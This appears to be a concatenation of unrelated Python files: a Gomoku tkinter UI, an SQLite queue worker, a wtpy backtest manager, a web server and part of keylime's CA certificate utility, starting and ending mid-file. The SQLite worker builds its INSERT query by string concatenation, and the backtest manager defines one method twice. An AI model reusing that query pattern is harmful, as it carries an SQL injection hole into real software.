assert b[k] == v
def test_box_object_call(self):
def f(*args, **kwargs):
return args, kwargs
b = BoxObject(f)
assert b(list(test_dict),
**movie_data) == f(list(test_dict), **movie_data)
def test_box_object_double_args(self):
with pytest.raises(TypeError):
BoxObject(function_example,
zip([1, 2, 3], [4, 5, 6]),
**movie_data)
def mp_queue_test(q):
bx = q.get(timeout=1)
try:
assert isinstance(bx, Box)
assert bx.a == 4
except AssertionError:
q.put(False)
else:
q.put(True)
|
ui.py | import threading
import queue
from tkinter import *
from tkinter import messagebox
from config import *
CW = 30
R = 10
class Scaler:
"""坐标变换器
方便对坐标进行放缩
"""
def __init__(self, start, end):
self.start = start
self.end = end
def bind(self, start, end):
self.new_start = start
self.new_end = end
return self
def inverse(self):
return Scaler(self.new_start, self.new_end).bind(self.start, self.end)
def __call__(self, value):
length = self.end - self.start
new_length = self.new_end - self.new_start
new_value = (value - self.start) / length * new_length + self.new_start
return new_value
class BinaryScaler:
"""二元坐标变换器"""
def __init__(self, start_x, start_y, end_x, end_y):
self.X = Scaler(start_x, end_x)
self.Y = Scaler(start_y, end_y)
def bind(self, start_x, start_y, end_x, end_y):
self.X.bind(start_x, end_x)
self.Y.bind(start_y, end_y)
return self
def inverse(self):
bs = BinaryScaler(self.X.new_start, self.Y.new_start, self.X.new_end, self.Y.new_end)
bs.bind(self.X.start, self.Y.start, self.X.end, self.Y.end)
return bs
def __call__(self, value_x, value_y):
return self.X(value_x), self.Y(value_y)
class UI:
"""UI 基类"""
def __init__(self, board_shape):
self.board_shape = board_shape
self.width, self.height = board_shape
def render(self, board, last_move):
raise NotImplementedError
def message(self, message):
raise NotImplementedError
def reset(self):
raise NotImplementedError
def input(self):
raise NotImplementedError
def game_start(self, game_loop):
game_loop()
class GUI(UI):
"""棋盘图形 UI"""
name = "GUI"
POINT_QUEUE = queue.Queue()
def __init__(self, board_shape):
super().__init__(board_shape)
self.tk = Tk()
self.tk.geometry("{}x{}".format(self.width * CW + 100, self.height * CW + 100))
self.tk.title("Gomoku")
self.bc = None
self.canvas = None
self.figures = {"chess": [], "flag": [], "board": []}
self._init_canvas()
self._init_board()
self.last_move = ()
def _init_canvas(self):
canvas_width, canvas_height = self.width * CW, self.height * CW
bc = BinaryScaler(0, 0, canvas_width, canvas_height).bind(-1, self.height, self.width, -1)
bc_ = bc.inverse()
self.bc = bc
self.canvas_width, self.canvas_height = canvas_width, canvas_height
canvas = Canvas(self.tk, width=canvas_width, height=canvas_height, bg="orange")
self.canvas = canvas
def on_click(event):
x, y = bc(event.x, event.y)
x, y = round(x), round(y)
GUI.POINT_QUEUE.put((x, y))
canvas.bind("<ButtonRelease-1>", on_click)
def _line(self, x1, y1, x2, y2, color="black", name="board"):
bc_ = self.bc.inverse()
x1, y1 = bc_(x1, y1)
x2, y2 = bc_(x2, y2)
figure_id = self.canvas.create_line(x1, y1, x2, y2, fill=color)
self.figures[name].append(figure_id)
def _init_board(self):
bc_ = self.bc.inverse()
canvas = self.canvas
for i in range(self.height):
self._line(0, i, self.width - 1, i, name="board")
for i in range(self.width):
self._line(i, 0, i, self.height - 1, name="board")
canvas.place(x=50, y=50, anchor="nw")
def _circle(self, x, y, radius=R, color="blue", name="chess"):
bc_ = self.bc.inverse()
x_pix, y_pix = bc_(x, y)
figure_id = self.canvas.create_oval(x_pix - radius, y_pix - radius, x_pix + radius, y_pix + radius, fill=color)
self.figures[name].append(figure_id)
def _delete(self, name):
for figure_id in self.figures[name]:
self.canvas.delete(figure_id)
self.figures[name].clear()
def _clear(self):
for name in self.figures:
self._delete(name)
def render(self, board, last_move):
self._delete(name="flag")
self._circle(*last_move, color=COLOR[board[last_move]], name="chess")
self._line(
last_move[0],
last_move[1] - 0.2,
last_move[0],
last_move[1] + 0.2,
color=COLOR[-board[last_move]],
name="flag",
)
self._line(
last_move[0] - 0.2,
last_move[1],
last_move[0] + 0.2,
last_move[1],
color=COLOR[-board[last_move]],
name="flag",
)
def message(self, message):
messagebox.showinfo("INFO", message)
def reset(self):
self._clear()
self._init_board()
def input(self):
GUI.POINT_QUEUE.queue.clear()
x, y = GUI.POINT_QUEUE.get()
return x, y
def game_start(self, game_loop):
loop_thread = threading.Thread(target=game_loop)
loop_thread.setDaemon(True)
loop_thread.start()
self.tk.mainloop()
class TerminalUI(UI):
"""终端游戏 UI"""
name = "TerminalUI"
def __init__(self, board_shape):
super().__init__(board_shape)
self._init_board()
def _init_board(self):
# 首行标号
for j in range(self.height):
print(f"\t{j}", end="")
print()
# 棋盘数据
for i in range(self.width):
print(f"{i}", end="")
for j in range(self.height):
print("\t_", end="")
print(f"\t{i}", end="")
print()
# 末行标号
for j in range(self.height):
print(f"\t{j}", end="")
print()
def render(self, board, last_move):
# 首行标号
for j in range(self.height):
print(f"\t{j}", end="")
print()
# 棋盘数据
for i in range(self.width):
print(f"{i}", end="")
for j in range(HEIGHT):
print("\t{}".format({BLACK: "x", WHITE: "o", EMPTY: "_"}[board[i, j]]), end="")
print(f"\t{i}", end="")
print()
print()
# 末行标号
for j in range(self.height):
print(f"\t{j}", end="")
print()
def message(self, message):
print(message)
def reset(self):
pass
def input(self):
x, y = input("> ").split(",")
x, y = int(x), int(y)
return x, y
class HeadlessUI(UI):
"""无 UI"""
name = "HeadlessUI"
def __init__(self, board_shape):
super().__init__(board_shape)
def render(self, board, last_move):
pass
def message(self, message):
pass
def reset(self):
pass
def input(self):
return -1, -1
|
DataBaseWorker.py | import sqlite3
import queue
import threading
import time
class DataBaseWorker:
def __init__(self, database_path):
self.database_path = database_path
# self.cursor = self.sql_connection.cursor()
self.queue = queue.Queue()
self.work = True
def start(self):
thread = threading.Thread(target=self._do_work)
thread.start()
def _do_work(self):
print('Started DataBase')
sql_connection = sqlite3.connect(self.database_path)
cursor = sql_connection.cursor()
while self.work:
if not self.queue.empty():
data = self.queue.get()
for match_state in data[3]:
try:
cursor.execute("INSERT INTO match_table VALUES ('" + data[1] + "', '" + data[0] + "', '" + data[2] + "', ?, ?, ?, ?, ?, ?)", match_state.get_sql_format())
except:
print('Error with Adding row in SQL')
sql_connection.commit()
else:
time.sleep(.1)
# Sleep
cursor.close()
sql_connection.close()
def add_to_queue(self, data):
self.queue.put(data)
def stop(self):
self.work = False |
test_random_generator.py | from threading import Thread
from subt_world_generation.random_tree_generator import RandomTreeGenerator, plot_random_tree
import matplotlib.pyplot as plt
from subt_world_generation.tile_tree import save_tree_as_world_file
import cProfile
def generator_thread():
tree = RandomTreeGenerator(max_tiles = 50)
tree.gen_tree()
plot_random_tree(tree,tunnel_axis=True)
def main():
plt.figure(figsize=(10,10))
th = Thread(target=generator_thread)
th.start()
plt.show()
th.join()
if __name__ == "__main__":
main() |
WtBtMon.py | '''
Descripttion: 回测管理模块
version:
Author: Wesley
Date: 2021-08-11 14:03:33
LastEditors: Wesley
LastEditTime: 2021-09-02 14:18:50
'''
import os
import json
import subprocess
import platform
import sys
import psutil
import hashlib
import datetime
import shutil
import json
import threading
import time
from wtpy import WtDtServo
from .WtLogger import WtLogger
from .EventReceiver import BtEventReceiver, BtEventSink
def isWindows():
if "windows" in platform.system().lower():
return True
return False
def md5_str(v:str) -> str:
return hashlib.md5(v.encode()).hexdigest()
def gen_btid(user:str, straid:str) -> str:
now = datetime.datetime.now()
s = user + "_" + straid + "_" + str(now.timestamp())
return md5_str(s)
def gen_straid(user:str) -> str:
now = datetime.datetime.now()
s = user + "_" + str(now.timestamp())
return md5_str(s)
class BtTaskSink:
def __init__(self):
pass
def on_start(self, user:str, straid:str, btid:str):
pass
def on_stop(self, user:str, straid:str, btid:str):
pass
def on_state(self, user:str, straid:str, btid:str, statInfo:dict):
pass
def on_fund(self, user:str, straid:str, btid:str, fundInfo:dict):
pass
class WtBtTask(BtEventSink):
'''
回测任务类
'''
def __init__(self, user:str, straid:str, btid:str, folder:str, logger:WtLogger = None, sink:BtTaskSink = None):
self.user = user
self.straid = straid
self.btid = btid
self.logger = logger
self.folder = folder
self.sink = sink
self._cmd_line = None
self._mq_url = "ipc:///wtpy/bt_%s.ipc" % (btid)
self._ticks = 0
self._state = 0
self._procid = None
self._evt_receiver = None
def __check__(self):
while True:
time.sleep(1)
pids = psutil.pids()
if psutil.pid_exists(self._procid):
continue
else:
print("%s process %d finished" % (self.btid, self._procid))
if self.sink is not None:
self.sink.on_stop(self.user, self.straid, self.btid)
break
def run(self):
if self._state != 0:
return
self._evt_receiver = BtEventReceiver(url=self._mq_url, logger=self.logger, sink=self)
self._evt_receiver.run()
self.logger.info("回测%s开始接收%s的通知信息" % (self.btid, self._mq_url))
try:
fullPath = os.path.join(self.folder, "runBT.py")
if isWindows():
self._procid = subprocess.Popen([sys.executable, fullPath], # 需要执行的文件路径
cwd=self.folder, creationflags=subprocess.CREATE_NEW_CONSOLE).pid
else:
self._procid = subprocess.Popen([sys.executable, fullPath], # 需要执行的文件路径
cwd=self.folder).pid
self._cmd_line = sys.executable + " " + fullPath
except:
self.logger.info("回测%s启动异常" % (self.btid))
self._state = 1
self.logger.info("回测%s的已启动,进程ID: %d" % (self.btid, self._procid))
self.watcher = threading.Thread(target=self.__check__, name=self.btid, daemon=True)
self.watcher.start()
@property
def cmd_line(self) -> str:
fullPath = os.path.join(self.folder, "runBT.py")
if self._cmd_line is None:
self._cmd_line = sys.executable + " " + fullPath
return self._cmd_line
def is_running(self, pids) -> bool:
bNeedCheck = (self._procid is None) or (not psutil.pid_exists(self._procid))
if bNeedCheck:
for pid in pids:
try:
pInfo = psutil.Process(pid)
cmdLine = pInfo.cmdline()
if len(cmdLine) == 0:
continue
# print(cmdLine)
cmdLine = ' '.join(cmdLine)
if self.cmd_line.upper() == cmdLine.upper():
self._procid = pid
self.logger.info("回测%s挂载成功,进程ID: %d" % (self.btid, self._procid))
if self._mq_url != '':
self._evt_receiver = BtEventReceiver(url=self._mq_url, logger=self.logger, sink=self)
self._evt_receiver.run()
self.logger.info("回测%s开始接收%s的通知信息" % (self.btid, self._mq_url))
self.watcher = threading.Thread(target=self.__check__, name=self.btid, daemon=True)
self.watcher.run()
except:
pass
return False
return True
def on_begin(self):
if self.sink is not None:
self.sink.on_start(self.user, self.straid, self.btid)
def on_finish(self):
pass
def on_state(self, statInfo:dict):
if self.sink is not None:
self.sink.on_state(self.user, self.straid, self.btid, statInfo)
print(statInfo)
def on_fund(self, fundInfo:dict):
if self.sink is not None:
self.sink.on_fund(self.user, self.straid, self.btid, fundInfo)
print(fundInfo)
class WtBtMon(BtTaskSink):
'''
回测管理器
'''
def __init__(self, deploy_folder:str, dtServo:WtDtServo = None, logger:WtLogger = None):
self.path = deploy_folder
self.user_stras = dict()
self.user_bts = dict()
self.logger = logger
self.dt_servo = dtServo
self.task_infos = dict()
self.task_map = dict()
self.__load_tasks__()
def __load_user_data__(self, user:str):
folder = os.path.join(self.path, user)
if not os.path.exists(folder):
os.mkdir(folder)
filepath = os.path.join(folder, "marker.json")
if not os.path.exists(filepath):
return False
f = open(filepath, "r")
content = f.read()
f.close()
obj = json.loads(content)
self.user_stras[user] = obj["strategies"]
self.user_bts[user] = obj["backtests"]
return True
def __save_user_data__(self, user):
folder = os.path.join(self.path, user)
if not os.path.exists(folder):
os.mkdir(folder)
obj = {
"strategies":{},
"backtests":{}
}
if user in self.user_stras:
obj["strategies"] = self.user_stras[user]
if user in self.user_bts:
obj["backtests"] = self.user_bts[user]
filepath = os.path.join(folder, "marker.json")
f = open(filepath, "w")
f.write(json.dumps(obj, indent=4, ensure_ascii=False))
f.close()
return True
def get_strategies(self, user:str) -> list:
if user not in self.user_stras:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
ay = list()
for straid in self.user_stras[user]:
ay.append(self.user_stras[user][straid])
return ay
def add_strategy(self, user:str, name:str) -> dict:
if user not in self.user_stras:
self.__load_user_data__(user)
if user not in self.user_stras:
self.user_stras[user] = dict()
straid = gen_straid(user)
self.user_stras[user][straid] = {
"id":straid,
"name":name,
"perform":{
"days": 0,
"total_return": 0,
"annual_return": 0,
"win_rate": 0,
"max_falldown": 0,
"max_profratio": 0,
"std": 0,
"down_std": 0,
"sharpe_ratio": 0,
"sortino_ratio": 0,
"calmar_ratio": 0
}
}
folder = os.path.join(self.path, user, straid)
if not os.path.exists(folder):
os.mkdir(folder)
fname = os.path.join(folder, "MyStrategy.py")
srcfname = os.path.join(self.path, "template/MyStrategy.py")
shutil.copyfile(srcfname, fname)
self.__save_user_data__(user)
return self.user_stras[user][straid]
def del_strategy(self, user:str, straid:str):
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return False
if straid not in self.user_stras[user]:
return True
folder = os.path.join(self.path, user, straid)
if not os.path.exists(folder):
return True
delFolder = os.path.join(self.path, user, ".del")
if not os.path.exists(delFolder):
os.mkdir(delFolder)
shutil.move(folder, delFolder)
self.user_stras[user].pop(straid)
self.__save_user_data__(user)
return True
def has_strategy(self, user:str, straid:str, btid:str = None) -> bool:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return False
if btid is None:
return straid in self.user_stras[user]
else:
return btid in self.user_bts[user]
def get_strategy_code(self, user:str, straid:str, btid:str = None) -> str:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
if btid is None:
path = os.path.join(self.path, user, straid, "MyStrategy.py")
if not os.path.exists(path):
return None
f = open(path, "r", encoding="UTF-8")
content = f.read()
f.close()
return content
else:
thisBts = self.user_bts[user]
if btid not in thisBts:
return None
bt_path = os.path.join(self.path, "%s/%s/backtests/%s/runBT.py" % (user, straid, btid))
f = open(bt_path, "r")
content = f.read()
f.close()
return content
def set_strategy_code(self, user:str, straid:str, content:str) -> bool:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return False
path = os.path.join(self.path, user, straid, "MyStrategy.py")
if not os.path.exists(path):
return None
f = open(path, "w", encoding="UTF-8")
f.write(content)
f.close()
return True
def get_backtests(self, user:str, straid:str) -> list:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
if user not in self.user_bts:
return None
ay = list()
for btid in self.user_bts[user]:
ay.append(self.user_bts[user][btid])
return ay
def del_backtest(self, user:str, btid:str):
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return
if user not in self.user_bts:
return
if btid in self.user_bts[user]:
self.user_bts[user].pop(btid)
self.logger.info("Backtest %s of %s deleted" % (btid, user))
self.__save_user_data__(user)
def get_bt_funds(self, user:str, straid:str, btid:str) -> list:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
thisBts = self.user_bts[user]
if btid not in thisBts:
return None
filename = "%s/%s/backtests/%s/outputs_bt/%s/funds.csv" % (user, straid, btid, btid)
filename = os.path.join(self.path, filename)
if not os.path.exists(filename):
return None
f = open(filename, "r")
lines = f.readlines()
f.close()
lines = lines[1:]
funds = list()
for line in lines:
cells = line.split(",")
if len(cells) > 10:
continue
tItem = {
"date": int(cells[0]),
"closeprofit": float(cells[1]),
"dynprofit": float(cells[2]),
"dynbalance": float(cells[3]),
"fee": 0
}
if len(cells) > 4:
tItem["fee"] = float(cells[4])
funds.append(tItem)
return funds
def get_bt_trades(self, user:str, straid:str, btid:str) -> list:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
thisBts = self.user_bts[user]
if btid not in thisBts:
return None
filename = "%s/%s/backtests/%s/outputs_bt/%s/trades.csv" % (user, straid, btid, btid)
filename = os.path.join(self.path, filename)
if not os.path.exists(filename):
return None
f = open(filename, "r")
lines = f.readlines()
f.close()
lines = lines[1:]
items = list()
for line in lines:
cells = line.split(",")
if len(cells) > 10:
continue
item = {
"code": cells[0],
"time": int(cells[1]),
"direction": cells[2],
"offset": cells[3],
"price": float(cells[4]),
"volume": float(cells[5]),
"tag": cells[6],
"fee": 0
}
if len(cells) > 7:
item["fee"] = float(cells[7])
if len(cells) > 4:
item["fee"] = float(cells[4])
items.append(item)
return items
def get_bt_rounds(self, user:str, straid:str, btid:str) -> list:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
thisBts = self.user_bts[user]
if btid not in thisBts:
return None
filename = "%s/%s/backtests/%s/outputs_bt/%s/closes.csv" % (user, straid, btid, btid)
filename = os.path.join(self.path, filename)
if not os.path.exists(filename):
return None
f = open(filename, "r")
lines = f.readlines()
f.close()
lines = lines[1:]
items = list()
for line in lines:
cells = line.split(",")
item = {
"code": cells[0],
"direct": cells[1],
"opentime": int(cells[2]),
"openprice": float(cells[3]),
"closetime": int(cells[4]),
"closeprice": float(cells[5]),
"qty": float(cells[6]),
"profit": float(cells[7]),
"maxprofit": float(cells[8]),
"maxloss": float(cells[9]),
"entertag": cells[11],
"exittag": cells[12]
}
items.append(item)
return items
def get_bt_signals(self, user:str, straid:str, btid:str) -> list:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
thisBts = self.user_bts[user]
if btid not in thisBts:
return None
filename = "%s/%s/backtests/%s/outputs_bt/%s/signals.csv" % (user, straid, btid, btid)
filename = os.path.join(self.path, filename)
if not os.path.exists(filename):
return None
f = open(filename, "r")
lines = f.readlines()
f.close()
lines = lines[1:]
items = list()
for line in lines:
cells = line.split(",")
if len(cells) > 10:
continue
item = {
"code": cells[0],
"target": float(cells[1]),
"sigprice": float(cells[2]),
"gentime": cells[3],
"tag": cells[4]
}
items.append(item)
return items
def get_bt_summary(self, user:str, straid:str, btid:str) -> list:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
thisBts = self.user_bts[user]
if btid not in thisBts:
return None
filename = "%s/%s/backtests/%s/outputs_bt/%s/summary.json" % (user, straid, btid, btid)
filename = os.path.join(self.path, filename)
if not os.path.exists(filename):
return None
f = open(filename, "r")
content = f.read()
f.close()
obj = json.loads(content)
return obj
def get_bt_state(self, user:str, straid:str, btid:str) -> list:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
thisBts = self.user_bts[user]
if btid not in thisBts:
return None
filename = "%s/%s/backtests/%s/outputs_bt/%s/btenv.json" % (user, straid, btid, btid)
filename = os.path.join(self.path, filename)
if not os.path.exists(filename):
return None
f = open(filename, "r")
content = f.read()
f.close()
obj = json.loads(content)
return obj
def get_bt_state(self, user:str, straid:str, btid:str) -> dict:
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
thisBts = self.user_bts[user]
if btid not in thisBts:
return None
filename = "%s/%s/backtests/%s/outputs_bt/%s/btenv.json" % (user, straid, btid, btid)
filename = os.path.join(self.path, filename)
if not os.path.exists(filename):
return None
f = open(filename, "r")
content = f.read()
f.close()
thisBts[btid]["state"] = json.loads(content)
return thisBts[btid]["state"]
def update_bt_state(self, user:str, straid:str, btid:str, stateObj:dict):
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
thisBts = self.user_bts[user]
if btid not in thisBts:
return None
thisBts[btid]["state"] = stateObj
def get_bt_kline(self, user:str, straid:str, btid:str) -> list:
if self.dt_servo is None:
return None
if user not in self.user_bts:
bSucc = self.__load_user_data__(user)
if not bSucc:
return None
btState = self.get_bt_state(user, straid, btid)
if btState is None:
return None
thisBts = self.user_bts[user]
if "kline" not in thisBts[btid]:
code = btState["code"]
period = btState["period"]
stime = btState["stime"]
etime = btState["etime"]
barList = self.dt_servo.get_bars(stdCode=code, period=period, fromTime=stime, endTime=etime)
if barList is None:
return None
bars = list()
for realBar in barList:
bar = dict()
if period[0] == 'd':
bar["time"] = realBar.date
else:
bar["time"] = 1990*100000000 + realBar.time
bar["bartime"] = bar["time"]
bar["open"] = realBar.open
bar["high"] = realBar.high
bar["low"] = realBar.low
bar["close"] = realBar.close
bar["volume"] = realBar.vol
bars.append(bar)
thisBts[btid]["kline"] = bars
return thisBts[btid]["kline"]
def run_backtest(self, user:str, straid:str, fromTime:int, endTime:int, capital:float, slippage:int=0) -> dict:
if user not in self.user_bts:
self.__load_user_data__(user)
if user not in self.user_bts:
self.user_bts[user] = dict()
btid = gen_btid(user, straid)
# 生成回测目录
folder = os.path.join(self.path, user, straid, "backtests")
if not os.path.exists(folder):
os.mkdir(folder)
folder = os.path.join(folder, btid)
os.mkdir(folder)
# 将策略文件复制到该目录下
old_path = os.path.join(self.path, user, straid, "MyStrategy.py")
new_path = os.path.join(folder, "MyStrategy.py")
shutil.copyfile(old_path, new_path)
# 初始化目录下的配置文件
old_path = os.path.join(self.path, "template/configbt.json")
new_path = os.path.join(folder, "configbt.json")
f = open(old_path, "r", encoding="UTF-8")
content = f.read()
f.close()
content = content.replace("$BTID$", btid)
f = open(new_path, "w", encoding="UTF-8")
f.write(content)
f.close()
old_path = os.path.join(self.path, "template/logcfgbt.json")
new_path = os.path.join(folder, "logcfgbt.json")
shutil.copyfile(old_path, new_path)
old_path = os.path.join(self.path, "template/fees.json")
new_path = os.path.join(folder, "fees.json")
shutil.copyfile(old_path, new_path)
old_path = os.path.join(self.path, "template/runBT.py")
new_path = os.path.join(folder, "runBT.py")
f = open(old_path, "r", encoding="UTF-8")
content = f.read()
f.close()
content = content.replace("$FROMTIME$", str(fromTime))
content = content.replace("$ENDTIME$", str(endTime))
content = content.replace("$STRAID$", btid)
content = content.replace("$CAPITAL$", str(capital))
content = content.replace("$SLIPPAGE$", str(slippage))
f = open(new_path, "w", encoding="UTF-8")
f.write(content)
f.close()
btInfo = {
"id":btid,
"capital":capital,
"runtime":datetime.datetime.now().strftime("%Y.%m.%d %H:%M:%S"),
"state":{
"code": "",
"period": "",
"stime": fromTime,
"etime": endTime,
"progress": 0,
"elapse": 0
},
"perform":{
"days": 0,
"total_return": 0,
"annual_return": 0,
"win_rate": 0,
"max_falldown": 0,
"max_profratio": 0,
"std": 0,
"down_std": 0,
"sharpe_ratio": 0,
"sortino_ratio": 0,
"calmar_ratio": 0
}
}
self.user_bts[user][btid] = btInfo
self.__save_user_data__(user)
# 添加
btTask = WtBtTask(user, straid, btid, folder, self.logger, sink=self)
btTask.run()
self.task_map[btid] = btTask
# 这里还需要记录一下回测的任务,不然如果重启就恢复不了了
taskInfo = {
"user":user,
"straid":straid,
"btid":btid,
"folder":folder
}
self.task_infos[btid]= taskInfo
self.__save_tasks__()
return btInfo
def __update_bt_result__(self, user:str, straid:str, btid:str):
if user not in self.user_bts:
self.__load_user_data__(user)
if user not in self.user_bts:
self.user_bts[user] = dict()
# 更新回测状态
stateObj = self.get_bt_state(user, straid, btid)
self.user_bts[user][btid]["state"] = stateObj
# 更新回测结果摘要
summaryObj = self.get_bt_summary(user, straid, btid)
self.user_bts[user][btid]["perform"] = summaryObj
self.user_stras[user][straid]["perform"] = summaryObj
self.__save_user_data__(user)
def __save_tasks__(self):
obj = self.task_infos
filename = os.path.join(self.path, "tasks.json")
f = open(filename, "w")
f.write(json.dumps(obj, indent=4))
f.close()
def __load_tasks__(self):
filename = os.path.join(self.path, "tasks.json")
if not os.path.exists(filename):
return
f = open(filename, "r")
content = f.read()
f.close()
task_infos = json.loads(content)
pids = psutil.pids()
for btid in task_infos:
tInfo = task_infos[btid].copy()
tInfo["logger"] = self.logger
btTask = WtBtTask(**tInfo)
if btTask.is_running(pids):
self.task_map[btid] = btTask
self.task_infos[btid] = task_infos[btid]
self.logger.info("回测任务%s已恢复")
else:
# 之前记录过测回测任务,执行完成了,要更新回测数据
self.__update_bt_result__(tInfo["user"], tInfo["straid"], btid)
self.__save_tasks__()
def on_start(self, user:str, straid:str, btid:str):
pass
def on_stop(self, user:str, straid:str, btid:str):
self.__update_bt_result__(user, straid, btid)
def on_state(self, user:str, straid:str, btid:str, statInfo:dict):
self.user_bts[user][btid]["state"] = statInfo
def on_fund(self, user:str, straid:str, btid:str, fundInfo:dict):
pass |
web_server.py | import responder
import datetime
import logging
import threading
log = logging.getLogger("WebServer")
class WebServer:
def __init__(self, settings, plugins):
self.api = responder.API(
title="Solar Wallbox",
version="0.0.1",
description="See and control your energy data and control your wallbox.",
static_dir=settings["common"]["static-assets"],
templates_dir=settings["common"]["templates"]
)
self.address = settings["web"]["address"]
self.port = settings["web"]["port"]
self.plugins = plugins
self.__register_routes()
self.__start_plugin_runtimes()
def __register_routes(self):
self.api.add_route("/", endpoint=self.__list_plugins)
for plugin in self.plugins.get_plugins():
plugin.add_webserver(self)
self.api.add_route(plugin.settings['plugin_path'], endpoint=plugin.endpoint)
def __start_plugin_runtimes(self):
log.info("Starting plugin runtimes...")
for plugin in self.plugins.get_plugins():
if plugin.has_runtime:
plugin_runtime_thread = threading.Thread(target=plugin.runtime, args=(self.plugins,), daemon=True)
plugin_runtime_thread.start()
def render_template(self, path, template_vars=None):
template_vars = template_vars if template_vars else {}
now = datetime.datetime.now()
template_vars['currentYear'] = now.year
return self.api.template(path, vars=template_vars)
#@staticmethod
def __list_plugins(self, req, resp):
template_vars = {
"pluginPackage": "home"
}
template_vars['res'] = self.__get_web_dict(self.plugins.list_plugins())
resp.html = self.render_template("home/index.html", template_vars)
def run(self):
self.api.run(address=self.address, port=self.port)
def __get_web_dict(self, plugins):
res = {
"cards": []
}
for (name, title, href) in plugins:
res['cards'].append(
{
"id": name,
"icons": [
{
"name": "sticky",
"size": 48,
"fill": "currentColor"
}
],
"title": title,
"href": href
}
)
return res |
ca_util.py | #!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage ;
# Create a temporary CA cert and it's private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
import simplejson as json
from M2Crypto import X509, EVP, BIO
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
global_password = None
# def globalcb(*args):
# global global_password
# return global_password.encode()
def setpassword(pw):
global global_password
if len(pw) == 0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir, name):
cwd = os.getcwd()
try:
config.ch_dir(workingdir, logger)
priv = read_private()
cacert = X509.load_cert('cacert.crt')
ca_pk = EVP.load_key_string(priv[0]['ca'])
cert, pk = ca_impl.mk_signed_cert(
cacert, ca_pk, name, priv[0]['lastserial'] + 1)
with open('%s-cert.crt' % name, 'wb') as f:
f.write(cert.as_pem())
f = BIO.MemoryBuffer()
pk.save_key_bio(f, None)
priv[0][name] = f.getvalue()
f.close()
# increment serial number after successful creation
priv[0]['lastserial'] += 1
write_private(priv)
# write out the private key with password
with os.fdopen(os.open("%s-private.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
biofile = BIO.File(f)
pk.save_key_bio(biofile, None)
biofile.close()
pk.get_rsa().save_pub_key('%s-public.pem' % name)
cc = X509.load_cert('%s-cert.crt' % name)
if cc.verify(cacert.get_pubkey()):
logger.info(
"Created certificate for name %s successfully in %s" % (name, workingdir))
else:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
config.ch_dir(workingdir, logger)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
if config.CA_IMPL == 'cfssl':
pk_str, cacert, ca_pk, _ = ca_impl.mk_cacert()
elif config.CA_IMPL == 'openssl':
cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
else:
raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
priv = read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.as_pem())
f = BIO.MemoryBuffer()
ca_pk.save_key_bio(f, None)
priv[0]['ca'] = f.getvalue()
f.close()
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
ca_pk.get_rsa().save_pub_key('ca-public.pem')
# generate an empty crl
if config.CA_IMPL == 'cfssl':
crl = ca_impl.gencrl([], cacert.as_pem(), pk_str)
elif config.CA_IMPL == 'openssl':
crl = ca_impl.gencrl([], cacert.as_pem(), str(priv[0]['ca']))
else:
raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
# Sanity checks...
cac = X509.load_cert('cacert.crt')
if cac.verify():
logger.info("CA certificate created successfully in %s" %
workingdir)
else:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
cwd = os.getcwd()
try:
config.ch_dir(workingdir, logger)
# zip up the crt, private key, and public key
with open('cacert.crt', 'r') as f:
cacert = f.read()
with open("%s-public.pem" % name, 'r') as f:
pub = f.read()
with open("%s-cert.crt" % name, 'r') as f:
cert = f.read()
